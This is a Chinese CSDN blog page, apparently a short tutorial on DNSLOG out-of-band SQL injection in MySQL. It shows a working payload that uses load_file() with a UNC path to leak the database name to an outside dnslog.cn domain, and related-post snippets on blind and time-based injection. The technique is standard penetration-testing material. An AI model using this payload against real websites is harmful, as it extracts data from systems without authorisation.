比延时盲注更省时省力的注入方式——DNSLOG注入

最新推荐文章于 2023-03-22 18:17:01 发布
最新推荐文章于 2023-03-22 18:17:01 发布
阅读量299 收藏
点赞数
分类专栏: kali linux渗透测试 文章标签: 数据库 mysql sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maluxiao123/article/details/115358335
版权

我们都知道延时盲注如果使用手工的方式,又费事又费力,即使使用工具同样很慢,所以出现了一种比较快速的注入方式,就是dns_load注入
使用dns_log注入需要满足两个条件
1.需要一个自己的dns域名服务器
2.需要在my.conf中加入secure_file_priv= (空)
在这里插入图片描述

因为这种注入方式的原理是通过数据库函数load_file(),通过函数发送请求,将sql语句查询的结果带出来给我们自己设置的DNS服务器解析,通过日志记录可以看到sql语句查询信息
在dnslog获取域名
在这里插入图片描述
在这里插入图片描述

paylod:id=1 and (select load_file(concat("\\\\",(select database()),".f1katv.dnslog.cn\\abc")))

在这里插入图片描述
注意点:不要踩坑,一定要在and的子查询里进行查询,或者使用union,否则无法达到解析效果

thesky0001
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql盲注 之布尔盲注延时盲注DNSLOG注入
L1ni01
04-06 198
一.先讲布尔盲注 相关函数
php 延时注入测试,突破延迟注入盲注速度限制,利用dns注入快速获取数据
weixin_34476045的博客
03-23 269
dns注入就是通过数据库对域名发起dns解析请求来达到快速获取数据目的。原理: 发个图先自己体会下通常在存在一个没有数据回显的注入点进行注入时,我们需要使用延迟注入或者盲注(布尔注入),这种注入速度非常慢,需要一个一字符猜解,而且很容易搞挂网站,这时候我们怎么快速获取数据呢?下面我就来详细讲解下mysqldns注入操作步骤。要准备的东西:域名2个,vps一台(装好sqlmap)没有上面的东西可以...
SQL注入漏洞(4)注入方法3 盲注
weixin_51339377的博客
03-18 1262
判定结果有还是没有有直接union select 会不会报错 会报错就报错注入,都没有就盲注 盲注---1.布尔盲注:(最好先猜出一个正确的用户名作为参照物才能进行盲注) 适用条件:不显示错误,也不显示任何数据库取出的内容显示 (没有闭合的报错 就要强行猜闭合方式) sqli-labs的T8 布尔盲注 ?id=1 正常 ?id=200000 不正常 ?id=1\ 不正常 ?id=haha 不正常 估计到数据库传入的参数是数字 尝试 id=1' --+ //正...
17、注入篇--DNS注入MySQL
WX公众号-小白学安全
04-10 836
DNS注入 DNS注入也称DNS带外注入DNSLog注入 DNSDNS(Domain Name System)域名系统,将域名与IP地址相互映射的一个分布式数据库 DNS注入核心是 将盲注变为显错注入 DNS-logDNS服务器的解析记录 注入基础 1、load_file() 读取文件的函数 ​ 读取文件并返回文件内容为字符串 ​ 要使用此函数文件必须位于主服务器上,必须指定完整路径的文件,而且必须有file权限 ​ 该文件所有字节可读,但文件内容必须小于max_allower_packe
延时盲注(一)
qq_45300786的博客
07-13 1166
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化 " and 1=2 %23 然后使用延时注入, " and sleep(5) %23 1,判断当前库名的长度 这里我们用到了数据库里的if语句 有点类似于三元运算,条件成立,就执行第二个,条件不成立就执行第三个。 " and if(length(database())=12,
用于sql延时盲注的脚本,比较初级
最新发布
03-22
主要是通过使用Time.time()函数获取时间戳,然后对比发送请求后的时间戳,如果差距为延时设置的时间则表明符合条件,通过字典搜索该ASCII码对应的字符然后插入到输出的字符串中。 程序中使用时主要修改url,最终输出...
双光反馈双光注入混沌半导体激光器延时特征峰抑制
02-07
提出利用双光反馈(DOF)主半导体激光器(SL)双光注入(DPI)到从SL的方案来隐藏混沌激光光强和相位的延时特征峰, 利用自相关函数和互... 在延时特征峰抑制到相同水平的前提下, DOF-DPI方案比其他方案具有宽的参数区间。
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
易语言内存注入
07-21
易语言内存注入源码,内存注入,启动工作,InstallHook,钩子函数,线程_建立线程,线程_枚举线程,系统_等待延时,系统_处理事件,系统_延时,SetWindowsHookEx,GetModuleHandle,CallNextHookEx,进程_取自进程ID,CreateThread...
SQL住入原始脚本_SQL注入python脚本_
10-03
用于SQL注入,打开SQLmap运行脚本。布尔盲注 延时注入
学习DNSlog注入
qq_41631806的博客
04-09 273
##学习 DNSlog注入 简介 在sql注入无回显的情况下,盲注是一种办法,但费时。dnslog注入可以将数据外带,通过dns解析日志读取回显数据。 原理及利用场景详见大佬们的博客 t1ddl3r–《使用DNSLOG拯救你的盲打盲注 》 afanti–《 巧用DNSlog实现无回显注入》 Armyzer0–《利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果》...
sql盲注
zhangxiao_lei的博客
05-08 887
十三s </div><!--end: blogTitle 博客的标题和副标题 --> <div id="navigator"> 博客园 首页 新随笔 联系 订阅 管理 <div class="blogStats"> <span id="stats_post_count">随笔 - 26  文章 - 0  评论 - 0 </di...
小白的CTF之路之DNSlog注入
glass_york的博客
01-07 1038
dnslog注入sqlilabs第九关
DNS_LOG注入
学习、分享、交流
05-19 1544
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
DNSLog原理及代码实现
0of_blog
08-04 4670
自实现DNSLog服务器的意义及作用: 一些公共DNSLog服务可能已进入防火墙黑名单。不依赖他人服务器,增加可靠性。 结合自己的漏洞扫描工具,定制化修改和部署DNSLog API。达到高的效率。 附加实现DNS重绑定攻击等其他功能 熟悉DNSLog底层技术原理......
SQL注入DnsLog注入
qq_52310755的博客
03-22 1921
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
DNSlog注入姿势
qq_43681802的博客
02-08 641
DNSlog注入(mysql数据库sql注入姿势) 简介:本文记录sql注入中的注入姿势DNSlog注入原理及其构造payload过程 文章目录DNSlog注入(mysql数据库sql注入姿势)前言一、什么是DNS(域名系统)?二、DNSlog注入注入场景注入具备条件什么是UNC路径?1.注入原理2.注入过程总结 前言 DNSLOG注入不是一种新的sql注入方式,而是一种注入姿势。方便为我们进行sql注入提供方法 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是DNS(域名系统)? DN
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 5868
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
vue输入框怎么处理延时盲注,给个例子
05-21
延时盲注是指攻击者在注入恶意代码后,通过延时等待来判断是否注入成功。在Vue中,可以通过设置debounce属性来处理延时盲注。 下面是一个例子: ```html <template> <div> <input type="text" v-model="keyword" @input="handleInput" /> <ul> <li v-for="item in list" :key="item">{{ item }}</li> </ul> </div> </template> <script> export default { data() { return { keyword: '', list: [], }; }, methods: { async handleInput() { await this.$nextTick(); // 等待DOM新 if (this.keyword.trim() !== '') { // 发送请求 const res = await this.$http.get('/api/search', { params: { keyword: this.keyword, }, }); this.list = res.data; } }, }, }; </script> ``` 在上面的例子中,我们使用了Vue的`$nextTick`方法来等待DOM新,以避免用户输入过快而导致的频繁请求。同时,我们也使用了async/await来处理异步请求,保证了程序的稳定性和可读性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值